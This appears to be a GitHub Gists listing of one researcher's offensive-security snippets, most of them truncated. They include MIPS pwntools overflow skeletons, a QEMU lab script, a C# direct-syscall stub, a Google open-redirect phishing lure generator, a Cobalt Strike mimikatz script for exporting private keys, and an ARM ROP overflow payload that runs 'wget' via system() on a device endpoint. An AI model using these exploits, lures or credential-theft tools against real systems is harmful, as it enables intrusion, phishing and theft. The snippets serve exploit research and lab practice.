
Boschko OlivierLaflamme

from pwn import *
# pwntools global settings for a 32-bit MIPS Linux target. pwntools treats
# arch='mips' as big-endian unless endian='little' is also set, so this has to
# match the binary under test. log_level='debug' logs every byte sent and
# received on the connection.
context.update(arch='mips', os='linux', log_level='debug')
# Switch read by the `if debug:` test that follows; 0 selects the else-branch
# rather than the bare remote() call.
debug = 0
# Path of the local binary.
file_name = './exp'
if debug:
r = remote()
else:
OlivierLaflamme / mips_pwndbg.txt
Created January 23, 2023 14:48
stack-based bof (buffer overflow) in mips
from pwn import *
# Configure pwntools once for the whole script: MIPS (big-endian by default in
# pwntools; add endian='little' for a little-endian target), Linux, and debug
# logging, which prints all traffic on the connection.
context.update(arch='mips', os='linux', log_level='debug')
# 0 means the `if debug:` branch that follows (a remote() call with no
# host/port) is not taken.
debug = 0
# Local binary the script works against.
file_name = './exp'
if debug:
r = remote()
else :
OlivierLaflamme / start-mipsel.sh
Created January 19, 2023 23:55
setup for qemu
# Lab network for the emulated guest: one bridge with a single tap port.
# No physical interface is added to the bridge in these lines, so the guest is
# reachable only from this host unless forwarding is configured elsewhere.
bridge=virbr0
tap=tap0

sudo brctl addbr "$bridge"
sudo ifconfig "$bridge" 192.168.5.1/24 up
# NOTE(review): under sudo the tap device is created for root, while the qemu
# command below runs without sudo. Presumably the script is run as root or
# access to the tap is granted another way; `tunctl -u "$USER"` would let
# QEMU run unprivileged. Confirm.
sudo tunctl -t "$tap"
sudo ifconfig "$tap" 192.168.5.11/24 up
sudo brctl addif "$bridge" "$tap"

# Boot the Debian wheezy image on the Malta board with the console on stdio.
# script=no stops QEMU from running its own ifup script; the tap was attached
# to the bridge by hand above. Wheezy no longer receives security updates, so
# keep the guest on this host-only bridge.
# NOTE(review): the file is named start-mipsel.sh, but this launches
# qemu-system-mips (big-endian) with "mips" kernel and disk image names.
# Confirm which endianness is intended.
qemu-system-mips \
    -M malta \
    -kernel vmlinux-3.2.0-4-4kc-malta \
    -hda debian_wheezy_mips_standard.qcow2 \
    -append "root=/dev/sda1" \
    -netdev "tap,id=tapnet,ifname=$tap,script=no" \
    -device rtl8139,netdev=tapnet \
    -nographic
OlivierLaflamme / calls.cs
Last active April 26, 2023 04:16
C# code that sets up an x64 syscall stub as a byte array, allocates that stub in memory, replaces the syscall ID with a user-defined one, creates a delegate for the stub, and then executes the syscall
using System;
using System.Runtime.InteropServices;
namespace SyscallStub
{
// Define the syscall stub as a byte array
static readonly byte[] syscallStub = new byte[] {
0x48, 0x31, 0xc0, // xor rax, rax
0x48, 0xbb, 0x01, 0x00, 0x00, 0x00, 0x00, // mov rbx, user-defined syscall ID
0x0f, 0x05 // syscall
OlivierLaflamme / google_lure.py
Created December 1, 2022 03:18 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
#!/usr/bin/env python3
"""
How to use:
Run this script out of /tmp in a separate cmd (CMD-A)
Leave this running; press CTRL+C if you want to kill it, or use `ps aux` to find the PID, then `kill -9 [PID]`
Step1: chmod +x peuse_cpu_crash.py
Step2: python3 peuse_cpu_crash.py
#!/bin/bash
# Print a fixed greeting followed by a newline.
printf '%s\n' "Hello World"
from boofuzz import *
# Fuzz target endpoint: a private (RFC 1918) address on TCP port 80.
IP, PORT = "192.168.0.5", 80
def check_response(target, fuzz_data_logger, session, *args, **kwargs):
fuzz_data_logger.log_info("Checking test case response...")
try:
response = target.recv(512)
except:
OlivierLaflamme / mmimikatz.cna
Created September 21, 2022 22:50 — forked from tothi/mmimikatz.cna
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
# Request data for what appears to be a stack buffer overflow proof of concept
# against the /goform/exeCommand handler of a device web server (the r0/r3/pc
# gadget comments below indicate an ARM target).
# NOTE(review): `host` and `struct` come from lines not shown here.
url = "http://%s:80/goform/exeCommand"%(host)
# Hard-coded libc load address: every address below is only valid where libc
# is mapped at this fixed base, so the payload presumes a target without ASLR.
libc=0x409a7000
godget1=0x00018298 #pop r3 pc
# Each offset is rebased onto `libc` and packed as a little-endian 32-bit word.
godget1 = struct.pack("< I",godget1+libc)
# presumably the offset of libc's system(); verify against the target's libc
system=0x0005A270
system = struct.pack("< I", system+libc)
# Command string carried at the end of the payload; the address is a private
# lab host.
command="wget 192.168.174.136"
godget2 = 0x00040cb8 # mov r0 sp; blx r3
godget2 = struct.pack("< I", godget2 + libc)
# 444 filler bytes plus ".gif", then the three packed addresses and the command.
# NOTE(review): how `password` is sent is not visible here. For defenders, an
# over-long or non-printable password value in requests to this endpoint is the
# signal to alert on. A length check before the copy, stack canaries and ASLR
# are the mitigations that would break this payload.
password = "A" * 444+".gif"+godget1+system+godget2+command